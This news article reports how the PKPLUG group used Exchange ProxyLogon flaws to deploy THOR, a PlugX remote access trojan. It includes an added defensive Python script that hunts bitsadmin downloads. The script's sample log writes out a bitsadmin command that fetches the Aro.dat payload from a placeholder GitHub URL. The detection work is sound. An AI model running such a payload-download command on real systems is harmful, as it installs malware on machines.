A Chinese cyberespionage group that has previously targeted Southeast Asian companies exploited the known flaws in Microsoft’s Exchange Server to deploy a previously undocumented variant of a remote access trojan (RAT).
Palo Alto Networks’ Unit 42 threat intelligence team attributed the intrusions to a threat actor known as PKPLUG (aka Mustang Panda and HoneyMyte). The malware it deploys is a new, rebranded version of the modular PlugX implant, called THOR.
PlugX is a second-stage, post-exploitation implant that gives attackers the ability to remotely control various features of a compromised PC. It allows keystroke logging, webcam control, file upload, download, and modification, and access to a remote command shell.
“The variant observed […] is unique in that it contains a change to its core source code: the replacement of its trademark word ‘PLUG’ to ‘THOR’,” Unit 42 researchers Mike Harbison and Alex Hinchliffe noted in a report published on Tuesday.
“The earliest THOR sample uncovered was from August 2019, and it is the earliest known instance of the rebranded code. New features were observed in this variant, including enhanced payload-delivery mechanisms and abuse of trusted binaries.”
Hafnium, a China-based group, was the first APT known to exploit the then-zero-day Exchange bugs (ProxyLogon) to steal sensitive data from select targets. Other threat actors soon began exploiting the flaws as well.
PKPLUG now joins that list. Unit 42 observed the actor targeting Microsoft Exchange servers and evading antivirus detection while doing so.
“The attackers then used a technique known as ‘living off the land,’ which uses trusted binaries to bypass antivirus detection. In this case, the Microsoft Windows binary bitsadmin.exe was used to download an innocuous file named Aro.dat (SHA256: 59BA902871E98934C054649CA582E2A01707998ACC78B2570FEF43DBD10F7B6F) from an actor-controlled GitHub repo to the target.”
Despite its innocuous name, chosen to resemble a utility for fixing Windows Registry problems, Aro.dat is in fact an encrypted PlugX payload. Once decrypted and loaded, this latest version of PlugX gives the attackers a range of tools to monitor and interact with the compromised system.
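As an added example that is not part of the original article or the Unit 42 report, the following Python script shows how a defender could hunt for the bitsadmin.exe living-off-the-land download described above in process-creation telemetry (Sysmon Event ID 1 or Windows Security 4688 command lines), and check a dropped file’s SHA256 against the Aro.dat indicator quoted from the report. The log format, hostnames, the GitHub URL, the destination paths and the internal allowlist are constructed for illustration; only the SHA256 comes from the report.

```python
"""Hunt for bitsadmin.exe downloads in process-creation logs and match
dropped files against the Aro.dat SHA256 published by Unit 42.
Everything except ARO_DAT_SHA256 is constructed for this example."""
import hashlib
import re
from urllib.parse import urlparse

# The one file indicator given in the report (normalised to lowercase hex).
ARO_DAT_SHA256 = "59BA902871E98934C054649CA582E2A01707998ACC78B2570FEF43DBD10F7B6F".lower()

# Hypothetical allowlist of internal hosts that may legitimately serve files
# via BITS; anything else is treated as a high-severity download.
INTERNAL_ALLOWLIST = {"wsus.corp.example"}

# Constructed sample lines modelled on a flattened process-creation event:
# timestamp, host, image path and the full command line.
SAMPLE_LOG = r'''2021-07-27T10:01:12Z host=EXCH01 image=C:\Windows\System32\bitsadmin.exe cmd="bitsadmin /transfer job1 /download /priority high https://raw.githubusercontent.com/example/repo/main/Aro.dat C:\ProgramData\Aro.dat"
2021-07-27T10:02:45Z host=EXCH01 image=C:\Windows\System32\bitsadmin.exe cmd="bitsadmin /list /allusers"
2021-07-27T10:03:10Z host=WKS07 image=C:\Windows\System32\cmd.exe cmd="cmd /c whoami"
2021-07-27T10:04:00Z host=EXCH01 image=C:\Windows\System32\bitsadmin.exe cmd="bitsadmin /transfer upd /download http://wsus.corp.example/update.cab C:\Temp\update.cab"'''

LINE_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) image=(?P<image>\S+) cmd="(?P<cmd>.*)"$')
URL_RE = re.compile(r'https?://[^\s"]+', re.IGNORECASE)


def parse_line(line):
    """Return the event fields as a dict, or None for lines that do not parse."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def detect_bitsadmin_downloads(log_text, allowlist=INTERNAL_ALLOWLIST):
    """Flag bitsadmin.exe /transfer invocations that fetch a URL.

    Severity is 'high' unless the source host is on the internal allowlist,
    so a download from a public code-hosting site such as GitHub surfaces
    immediately even though bitsadmin itself is a signed Windows binary."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if image != "bitsadmin.exe":
            continue
        cmd = ev["cmd"]
        # Only the transfer verb downloads; /list, /info etc. are benign admin use.
        if not re.search(r"/transfer\b", cmd, re.IGNORECASE):
            continue
        for url in URL_RE.findall(cmd):
            src_host = (urlparse(url).hostname or "").lower()
            dest = cmd.split()[-1]  # bitsadmin takes the local path as the last argument
            alerts.append({
                "time": ev["ts"],
                "host": ev["host"],
                "url": url,
                "source_host": src_host,
                "destination": dest,
                "severity": "low" if src_host in allowlist else "high",
            })
    return alerts


def file_sha256(data):
    """SHA256 hex digest of a file's bytes, lowercase to match ARO_DAT_SHA256."""
    return hashlib.sha256(data).hexdigest()


def is_known_aro_dat(digest_hex):
    """True if a digest (any case) equals the Aro.dat indicator from the report."""
    return digest_hex.strip().lower() == ARO_DAT_SHA256


if __name__ == "__main__":
    for a in detect_bitsadmin_downloads(SAMPLE_LOG):
        print(f"[{a['severity']}] {a['time']} {a['host']}: bitsadmin fetched {a['url']} -> {a['destination']}")
    # A dropped file would be read from disk and hashed with file_sha256();
    # here we only show that unrelated content does not match the indicator.
    print("matches Aro.dat:", is_known_aro_dat(file_sha256(b"not the real payload")))
```

Hashing alone is weak against a re-encrypted or repacked payload, so the behavioural rule (bitsadmin.exe writing a file fetched from a non-allowlisted host, especially onto an Exchange server) is the part worth deploying; the BITS client operational event log and the destination file’s creation event give the same activity from two other angles and can be correlated with the alert above.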
Unit 42 ties THOR to PKPLUG through shared command-and-control infrastructure and overlaps in the malicious behavior observed.
Additional details of the attack can be found in the original write-up. Unit 42 has also released a Python script that can decrypt and encrypt PlugX payloads.